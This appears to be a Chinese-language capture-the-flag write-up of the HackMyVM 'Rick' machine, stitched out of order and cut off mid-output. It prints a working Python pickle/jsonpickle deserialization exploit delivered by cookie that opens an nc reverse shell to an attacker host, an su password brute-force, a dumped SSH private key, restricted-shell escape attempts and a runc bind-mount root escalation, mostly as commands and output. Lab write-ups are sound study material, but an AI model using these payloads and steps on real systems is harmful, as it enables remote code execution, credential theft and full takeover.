"root": {\n "path": "rootfs",\n "readonly": false # \u9ed8\u8ba4\u4e3a true\n},<\/code><\/pre>\nrick@rick:\/tmp$ vim config.json \nrick@rick:\/tmp$ diff config.json \/home\/rick\/config.json \n55c55\n< "readonly": false\n---\n> "readonly": true\n65,74d64\n< "type": "bind",\n< "source": "\/",\n< "destination": "\/",\n< "options": [\n< "rbind",\n< "rw",\n< "rprivate"\n< ]\n< },\n< {\n188c178\n< }\n---\n> }\n\\ No newline at end of file<\/code><\/pre>\n\u5c1d\u8bd5\u518d\u6b21\u8fdb\u884c\u63d0\u6743\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8fdb\u884c\u4fee\u6539\u4e86\uff01<\/p>\n
rick@rick:\/tmp$ sudo \/usr\/sbin\/runc run demo\n# cd ~\n# pwd\n\/root\n# ls -la\ntotal 32\ndrwx------ 5 root root 4096 Nov 24 2021 .\ndrwxr-xr-x 18 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwx------ 3 root root 4096 Nov 24 2021 .gnupg\ndrwxr-xr-x 3 root root 4096 Aug 19 2019 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\ndrwx------ 2 root root 4096 Nov 24 2021 .ssh\n-rwx------ 1 root root 36 Nov 24 2021 root.txt\n# touch whoami\n# ls -la\ntotal 32\ndrwx------ 5 root root 4096 Jul 16 04:21 .\ndrwxr-xr-x 18 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwx------ 3 root root 4096 Nov 24 2021 .gnupg\ndrwxr-xr-x 3 root root 4096 Aug 19 2019 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\ndrwx------ 2 root root 4096 Nov 24 2021 .ssh\n-rwx------ 1 root root 36 Nov 24 2021 root.txt\n-rw-r--r-- 1 root root 0 Jul 16 04:21 whoami<\/code><\/pre>\n\u53d1\u73b0\u53ef\u4ee5\u8fdb\u884c\u4fee\u6539\u4e86\uff01\uff01\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/28right.blogspot.com\/2021\/12\/hackmyvm-rick.html<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ rustscan -a $IP -- -A \n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 172.20.10.3:22\nOpen 172.20.10.3:80\nOpen 172.20.10.3:5000\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 f9:c1:73:95:a4:17:df:f6:ed:5c:8e:8a:c8:05:f9:8f (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc6WD+nd5ZbnlOmJHKiExjfgbFX6q+QAKK3N+lsm6vntaQ3CRgdDBf37SsO5ptEHMUZrDPGBch03b0An18k6pHwSLfz5AuCTN3W0Rtqd2iFRqkhgoVatSEoESxCwULEpsRB738QhCeAfiTgHr\/s5WtdQAgEoSBS6e4k8KHRD1M+8FVHrolrvJA\/\/cQ7VzVvCDbQ\/eYWh3kUjRJj\/cFzY\/Jpgwu0QxNhzXmHwroAjtzd0D59f\/KIxG0ULyAr9aQoQVjy7fMN7wJyZZxhLLKSSMoT7G51khfn9Bwun9peI32IwZnVJ3L87fGgsSy\/KdOjJDRLsGCXJNtT+jUviHAaTWz\n| 256 be:c1:fd:f1:33:64:39:9a:68:35:64:f9:bd:27:ec:01 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIh5KJU7muB4UyLIXStFY9R+LekTaOgLGzYh\/sWHOO+aj7OOE8QDWgjPTSZt0uDG9+bmT3Uz8v3EY2b0QDP5X9I=\n| 256 66:f7:6a:e8:ed:d5:1d:2d:36:32:64:39:38:4f:9c:8a (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGBDJ\/OjwxXNZ01JjiQXyOVhcY3z9ADXsEWJEOUMdHpd\n80\/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))\n|_http-title: Apache2 Test Debian Default Page: It works\n|_http-server-header: Apache\/2.4.38 (Debian)\n| http-methods: \n|_ Supported Methods: HEAD GET POST OPTIONS\n5000\/tcp open http syn-ack Werkzeug httpd 0.15.5 (Python 2.7.16)\n| http-title: 500 Internal Server Error\n|_Requested resource was http:\/\/172.20.10.3:5000\/whoami\n| http-methods: \n|_ Supported Methods: HEAD OPTIONS GET\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u8fdb\u884c\u5e38\u89c4\u7684\u626b\u4e00\u4e0b\u5f97\u4e86\uff0c\u5e73\u5e38\u7528\u4e0a\u7684\u4e5f\u4e0d\u591a\uff0c\u5230\u65f6\u5019\u518d\u626b<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n\/.php (Status: 403) [Size: 276]\n\/index.html (Status: 200) [Size: 10706]\n\/.html (Status: 403) [Size: 276]\n\/manual (Status: 301) [Size: 311] [--> http:\/\/172.20.10.3\/manual\/]\n\/javascript (Status: 301) [Size: 315] [--> http:\/\/172.20.10.3\/javascript\/]\n\/robots.txt (Status: 403) [Size: 276]<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
\u8e29\u70b9\uff0c\u53d1\u73b0\u9ed8\u8ba4\u7684\u662f\u9ed8\u8ba4\u5f97apache\u9ed8\u8ba4\u754c\u9762\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ whatweb http:\/\/$IP \nhttp:\/\/172.20.10.3 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[172.20.10.3], Title[Apache2 Test Debian Default Page: It works]<\/code><\/pre>\n\u654f\u611f\u76ee\u5f55<\/h3>\n
\u6ca1\u53d1\u73b0\u6709\u5565\u6709\u7528\u7684\uff0c\u57fa\u672c\u4e0a\u76ee\u5f55\u6743\u9650\u90fd\u6ca1\u6709\u3002<\/p>\n
\u654f\u611f\u7aef\u53e3<\/h3>\n
\u770b\u4e00\u4e0b 5000 \u7aef\u53e3\uff0c\u4e00\u8fb9\u626b\u4e00\u4e0b\uff0c\u4e00\u904d\u624b\u52a8\u770b\u4e00\u4e0b\uff1a<\/p>\n
<\/code><\/pre>\n<\/div><\/p>\n\u70b9\u51fbMain page<\/code>\u56de\u5230\uff1a<\/p>\n<\/div><\/p>\n\u67e5\u770b\u6e90\u7801\uff0c\u672a\u53d1\u73b0\u5947\u602a\u7684\u5185\u5bb9\u4e0e\u63d0\u793a\uff0c\u4e14\u5c1d\u8bd5\u6267\u884c\u547d\u4ee4\u53d1\u73b0\u5931\u8d25\uff1a<\/p>\n
http:\/\/172.20.10.3:5000\/id\n# Not Found\n# The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.<\/code><\/pre>\n\u5c1d\u8bd5F12<\/code>\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<\/div><\/p>\n\u53d1\u73b0\u672a\u77e5base64<\/code>\u52a0\u5bc6\u540e\u7684cookie\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ echo 'eyJweS9vYmplY3QiOiAiX19tYWluX18uVXNlciIsICJ1c2VybmFtZSI6ICJSaWNrIn0=' | base64 -d | jq\n{\n "py\/object": "__main__.User",\n "username": "Rick"\n}<\/code><\/pre>\n\u5f88\u660e\u663e\u662f\u4e00\u4e2apython\u7684\u5e8f\u5217\u5316\uff0c\u5c1d\u8bd5\u641c\u7d22\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff1a<\/p>\n
https:\/\/swisskyrepo.github.io\/PayloadsAllTheThings\/Insecure%20Deserialization\/Python\/#pickle<\/a><\/p>\nimport cPickle, os\nfrom base64 import b64encode, b64decode\n\nclass Evil(object):\n def __reduce__(self):\n return (os.system,("nc -e \/bin\/bash 172.20.10.8 1234",))\n\ne = Evil()\nevil_token = b64encode(cPickle.dumps(e))\nprint("Your Evil Token : {}").format(evil_token)<\/code><\/pre>\n\u5c1d\u8bd5\u6784\u9020\u4e00\u4e0b\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u6267\u884c\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ python2 exp.py\nYour Evil Token : Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL2Jhc2ggMTcyLjIwLjEwLjggMTIzNCcKcDIKdHAzClJwNAou\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ curl -b "Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL2Jhc2ggMTcyLjIwLjEwLjggMTIzNCcKcDIKdHAzClJwNAou" http:\/\/$IP:5000\n<!DOCTYPE HTML PUBLIC "-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN">\n<title>Redirecting...<\/title>\n<h1>Redirecting...<\/h1>\n<p>You should be redirected automatically to target URL: <a href="\/whoami">\/whoami<\/a>. If not click the link.\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ echo 'Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL2Jhc2ggMTcyLjIwLjEwLjggMTIzNCcKcDIKdHAzClJwNAou' | base64 -d\ncposix\nsystem\np1\n(S'nc -e \/bin\/bash 172.20.10.8 1234'\np2\ntp3\nRp4\n. <\/code><\/pre>\n\u53d1\u73b0\u4e0d\u592a\u5f97\u52b2\uff0c\u6362\u4e00\u4e2a\uff1ahttps:\/\/github.com\/j0lt-github\/python-deserialization-attack-payload-generator<\/a><\/p>\n<\/div><\/p>\n# git clone https:\/\/github.com\/j0lt-github\/python-deserialization-attack-payload-generator.git\n# cd python-deserialization-attack-payload-generator\n# ls -la\n# pip3 install -r requirements.txt\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ python3 peas.py \nEnter RCE command :nc -e \/bin\/bash 172.20.10.8 1234\nEnter operating system of target [linux\/windows] . Default is linux :\nWant to base64 encode payload ? [N\/y] :y\nEnter File location and name to save :.\/payload\nSelect Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :jsonpickle\nDone Saving file !!!!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ cat payload_jspick \neyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTcyLjIwLjEwLjgiLCAiMTIzNCJdfV19XX0= \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ echo 'eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTcyLjIwLjEwLjgiLCAiMTIzNCJdfV19XX0=' | base64 -d \n{"py\/reduce": [{"py\/type": "subprocess.Popen"}, {"py\/tuple": [{"py\/tuple": ["nc", "-e", "\/bin\/bash", "172.20.10.8", "1234"]}]}]}<\/code><\/pre>\n\u770b\u8d77\u6765\u5f88\u5b8c\u7f8e\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ curl -b "eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTcyLjIwLjEwLjgiLCAiMTIzNCJdfV19XX0=" http:\/\/$IP:5000\n<!DOCTYPE HTML PUBLIC "-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN">\n<title>Redirecting...<\/title>\n<h1>Redirecting...<\/h1>\n<p>You should be redirected automatically to target URL: <a href="\/whoami">\/whoami<\/a>. If not click the link.<\/code><\/pre>\n\u53d1\u73b0\u5fd8\u4e86\u52a0\u5934\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ curl -b "username=Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL2Jhc2ggMTcyLjIwLjEwLjggMTIzNCcKcDIKdHAzClJwNAou" http:\/\/$IP:5000\n<!DOCTYPE HTML PUBLIC "-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN">\n<title>500 Internal Server Error<\/title>\n<h1>Internal Server Error<\/h1>\n<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.<\/p>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ curl -b "username=eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTcyLjIwLjEwLjgiLCAiMTIzNCJdfV19XX0=" http:\/\/$IP:5000\n<!DOCTYPE HTML PUBLIC "-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN">\n<title>500 Internal Server Error<\/title>\n<h1>Internal Server Error<\/h1>\n<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.<\/p><\/code><\/pre>\n\u7b2c\u4e8c\u4e2a\u8fd0\u884c\u4ee5\u540e\u53d1\u73b0\u5f39\u56de\u6765\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@rick:\/var\/www\/html$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n(remote) www-data@rick:\/var\/www\/html$ cat \/etc\/passwd | grep 'sh'\nroot:x:0:0:root:\/root:\/bin\/bash\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nrick:x:1000:1000:,,,:\/home\/rick:\/bin\/bash\nmorty:x:1001:1001:,,,:\/home\/morty:\/bin\/rbash\n(remote) www-data@rick:\/var\/www\/html$ cd \/home\/morty\/\n(remote) www-data@rick:\/home\/morty$ ls -la\ntotal 36\ndrwxr-xr-x 4 morty morty 4096 Nov 24 2021 .\ndrwxr-xr-x 4 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 morty morty 220 Nov 24 2021 .bash_logout\n-rw-r--r-- 1 morty morty 3526 Nov 24 2021 .bashrc\ndrwx------ 3 morty morty 4096 Nov 24 2021 .gnupg\n-rw-r--r-- 1 rick rick 107 Nov 24 2021 .important\n-rw-r--r-- 1 morty morty 807 Nov 24 2021 .profile\ndrwx------ 2 morty morty 4096 Nov 24 2021 .ssh\n-rw------- 1 morty morty 680 Nov 24 2021 .viminfo\n(remote) www-data@rick:\/home\/morty$ cat .important \n-***You are completely crazy Morty to keep a password that easy! Change it before you get hacked!***-\nRick<\/code><\/pre>\nsu\u7206\u7834\u7528\u6237morty<\/h3>\n
\u5c1d\u8bd5\u4e0a\u4f20\u5b57\u5178\u4ee5\u53ca\u7206\u7834\u811a\u672c\uff1ahttps:\/\/github.com\/carlospolop\/su-bruteforce<\/a><\/p>\n(remote) www-data@rick:\/tmp$ .\/suBF.sh -u morty\n [+] Bruteforcing morty...\n^C\n(remote) www-data@rick:\/tmp$ .\/suBF.sh -u morty -w top12000.txt \n [+] Bruteforcing morty...\n You can login as morty using password: internet\n^C<\/code><\/pre>\n\u53d1\u73b0\u53ef\u4ee5\u5207\u6362\u7528\u6237<\/p>\n
morty\ninternet<\/code><\/pre>\nperlbug \u63d0\u6743<\/h3>\n(remote) www-data@rick:\/tmp$ su morty\nPassword: \nmorty@rick:\/tmp$ cd ~\nrbash: cd: restricted\nmorty@rick:\/tmp$ whoami\nmorty\nmorty@rick:\/tmp$ echo $SHELL\n\/bin\/rbash\nmorty@rick:\/tmp$ ls -la \/home\/morty\ntotal 36\ndrwxr-xr-x 4 morty morty 4096 Nov 24 2021 .\ndrwxr-xr-x 4 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 morty morty 220 Nov 24 2021 .bash_logout\n-rw-r--r-- 1 morty morty 3526 Nov 24 2021 .bashrc\ndrwx------ 3 morty morty 4096 Nov 24 2021 .gnupg\n-rw-r--r-- 1 rick rick 107 Nov 24 2021 .important\n-rw-r--r-- 1 morty morty 807 Nov 24 2021 .profile\ndrwx------ 2 morty morty 4096 Nov 24 2021 .ssh\n-rw------- 1 morty morty 680 Nov 24 2021 .viminfo\nmorty@rick:\/tmp$ cat .ssh\/id_rsa\ncat: .ssh\/id_rsa: No such file or directory\nmorty@rick:\/tmp$ ls -la \/home\/morty\/.ssh\ntotal 16\ndrwx------ 2 morty morty 4096 Nov 24 2021 .\ndrwxr-xr-x 4 morty morty 4096 Nov 24 2021 ..\n-rw-r--r-- 1 morty morty 397 Nov 24 2021 authorized_keys\n-rw------- 1 morty morty 1823 Nov 24 2021 id_rsa\nmorty@rick:\/tmp$ cat \/home\/morty\/.ssh\/id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAy7by5MzwimmC6fONkUMVjQU31ABHe1YfN2OHOGL3JCOwYZt6ya3s\n+LAfEfcpE8y7Ksyi\/tzoEAUfT+bIp4DS5C9KaBgoks4GHl30IcXQr4BKELsCPm5liQS0i9\noCBW\/ECkKrsuwOxRqQk1QAgxJ0xh1A2LKgjGkIH0SW8fuem3oSmL3ki4tZ9wdHREx2d6BB\n6cfTmOjUNlDk9\/UeHvLicRPgIvAI0Y\/Aod1aP56qSK+9nujZlWhGkeenRC3Eme2FpcPW6M\nte0Zh32+CetgrTAZZtn\/FB+vohvjPyv8U77XjqK2d71aZypBYo4qVIZVjmwYii6iwYrRrL\nmfSA00mOtQAAA8hQRDPRUEQz0QAAAAdzc2gtcnNhAAABAQDLtvLkzPCKaYLp842RQxWNBT\nfUAEd7Vh83Y4c4YvckI7Bhm3rJrez4sB8R9ykTzLsqzKL+3OgQBR9P5singNLkL0poGCiS\nzgYeXfQhxdCvgEoQuwI+bmWJBLSL2gIFb8QKQquy7A7FGpCTVACDEnTGHUDYsqCMaQgfRJ\nbx+56behKYveSLi1n3B0dETHZ3oEHpx9OY6NQ2UOT39R4e8uJxE+Ai8AjRj8Ch3Vo\/nqpI\nr72e6NmVaEaR56dELcSZ7YWlw9boy17RmHfb4J62CtMBlm2f8UH6+iG+M\/K\/xTvteOorZ3\nvVpnKkFijipUhlWObBiKLqLBitGsuZ9IDTSY61AAAAAwEAAQAAAQBsyMyafAozj7aWIjZG\nDRHUFaZDcsa5STswQ9jwtoCNbvWAmhuO2W8DOmHNITRxW1HTwCWGfgb6jxGyhGZAdJ2pts\ntAHS6Ffrlru\/ZjlpQjNBnZJ1RCbIeSDM4xJIER0CZa6FFyIXadsNrloeUIGXH8XaDEV1c+\nw9PPhrwoipqfITOvI11+oWyaM5zFr\/ScTeP3UCAWnXAVpEaJMRPUyzN1HWcbqlPds6iVEm\nwy+nUxWDn2tkHYkXvsxg\/4iK54f5mdgvobkMJe6YXlmmDTwIqxM26NCn+YcnuBSNZTpgSv\nerAfSu86toGvwpVj3QN7Sd7xoPKExsKQz6nn6LCNGot9AAAAgQDNHON6hrdcZCrc7+2fhu\n4ZyDX2\/lzggW5eGN4Q2zX2WyVIfpYwxH9M+bMpDSVYaFcw4u38BDo6gGgptdzYvOukvkOJ\nPXuH40SVJMpJGzCRr9x+O4y3A61u7SfOH+e+Qa4Z32GRt5X3iTIYDGhoTEwdDAe9mbIF60\nKeXF\/cF6XO\/gAAAIEA8xCxeR\/rXL1Rennm\/jObw\/Nvtv9NuA4TlMVTk5qiAikyp7iEXWOo\n4Psfr9HKJ8j3xt0jaIVvMxExva+XfvfduQybBidLhf8p3Z03NwNIcKNBydakMomjN1HKxY\nNV+DbeHL0X6+9Z8NuF4HVd0GjpOKe4EZ5VFLsyjs8JHoKOYLMAAACBANaOLZSvEa0DSR9b\n8XP97CGjp97fEl\/gyOjmha2sW4ZXdEj55j\/CyZ6FdT8BsF9ygTtBFBDI5\/pFkdKQNxj\/Aw\nTsGzDINUlZhk3iK4Mkk5\/DsUU1V4fW2vUiXAb\/WkLNd+frGHC\/ewUC0y077ClTnOCR8OX9\nhj+7nT1fqBN\/qbb3AAAAD21vcnR5QHN5bWZvbm9zNAECAw==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u5c1d\u8bd5\u767b\u5f55\u4e0a\u53bb\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8f6cshell\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ ssh morty@$IP -i morty -t bash \nThe authenticity of host '172.20.10.3 (172.20.10.3)' can't be established.\nED25519 key fingerprint is SHA256:ntMXt1jIeiDKNEuRMRXU6uCVo\/fmwaEqmxDA5r4nwds.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '172.20.10.3' (ED25519) to the list of known hosts.\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash\nmorty@rick:~$ sudo -l\nMatching Defaults entries for morty on rick:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser morty may run the following commands on rick:\n (rick) NOPASSWD: \/usr\/bin\/perlbug<\/code><\/pre>\n\u53d1\u73b0\u63d0\u6743\u65b9\u6848\uff1ahttps:\/\/gtfobins.github.io\/gtfobins\/perlbug\/<\/a><\/p>\n\u5c1d\u8bd5\u6267\u884c\uff1a<\/p>\n
morty@rick:~$ sudo -u rick \/usr\/bin\/perlbug -s 'x x x' -r x -c x -e 'exec \/bin\/bash;'\nThis program provides an easy way to create a message reporting\na bug in the core perl distribution (along with tests or\npatches) to the volunteers who maintain perl at\nperlbug@perl.org. To send a thank-you note to perl-\nthanks@perl.org instead of a bug report, please run\n'perlthanks'.\n\nPlease do not use \/usr\/bin\/perlbug to send test messages, test\nwhether perl works, or to report bugs in perl modules from CPAN.\n\nSuggestions for how to find help using Perl can be found at\nhttp:\/\/perldoc.perl.org\/perlcommunity.html\n\nIf your bug is about a Perl module rather than a core language\nfeature, please enter its name here. If it's not, just hit Enter\nto skip this question.\n\nModule: whoami\nwhoami is not a "core" Perl module. Please check that you\nentered its name correctly. If it is correct, quit this program,\ntry searching for whoami on http:\/\/rt.cpan.org, and report your\nissue there.\n\nIf your bug is about a Perl module rather than a core language\nfeature, please enter its name here. If it's not, just hit Enter\nto skip this question.\n\nModule: ^C\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash\nmorty@rick:~$ whoami;id\nmorty\nuid=1001(morty) gid=1001(morty) groups=1001(morty)\nmorty@rick:~$ sudo -u rick \/usr\/bin\/perlbug -s 'whoami' -r x -c x -e 'exec \/bin\/bash;'\nThis program provides an easy way to create a message reporting\na bug in the core perl distribution (along with tests or\npatches) to the volunteers who maintain perl at\nperlbug@perl.org. To send a thank-you note to perl-\nthanks@perl.org instead of a bug report, please run\n'perlthanks'.\n\nPlease do not use \/usr\/bin\/perlbug to send test messages, test\nwhether perl works, or to report bugs in perl modules from CPAN.\n\nSuggestions for how to find help using Perl can be found at\nhttp:\/\/perldoc.perl.org\/perlcommunity.html\n\nThe subject you entered wasn't very descriptive. Please try again.\n\nFirst of all, please provide a subject for the message.\nThis should be a concise description of your bug or problem\nwhich will help the volunteers working to improve perl to\ncategorize and resolve the issue. Be as specific and\ndescriptive as you can. A subject like "perl bug" or "perl\nproblem" will make it much less likely that your issue gets the\nattention it deserves.\n\nSubject: whoami\n\nThe subject you entered wasn't very descriptive. Please try again.\n\nSubject: ^C\nmorty@rick:~$ whoami;id\nmorty\nuid=1001(morty) gid=1001(morty) groups=1001(morty)<\/code><\/pre>\n\u8fd8\u662f\u4e0d\u9614\u4ee5\uff0c\u5c1d\u8bd5\u5176\u4ed6\u529e\u6cd5\u5148\u83b7\u53d6bash<\/code>\uff0c\u770b\u5230\u76ee\u5f55\u5b58\u5728vim<\/code>\u7f16\u8f91\u7684\u75d5\u8ff9\uff0c\u5c1d\u8bd5\u4f7f\u7528vim<\/code>\u63d0\u53d6\u4e00\u4e0bshell\uff01<\/p>\nmorty@rick:~$ vim -c ':!\/bin\/bash'\n\n\/bin\/rbash: \/bin\/bash: restricted: cannot specify `\/' in command names\n\nshell returned 1\n\nPress ENTER or type command to continue\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash<\/code><\/pre>\n\u7ee7\u7eed\u67e5\u627e\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
morty@rick:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep\nmorty@rick:~$ printenv\nSHELL=\/bin\/rbash\nPWD=\/home\/morty\nLOGNAME=morty\nXDG_SESSION_TYPE=tty\nHOME=\/home\/morty\nLANG=en_US.UTF-8\nLS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.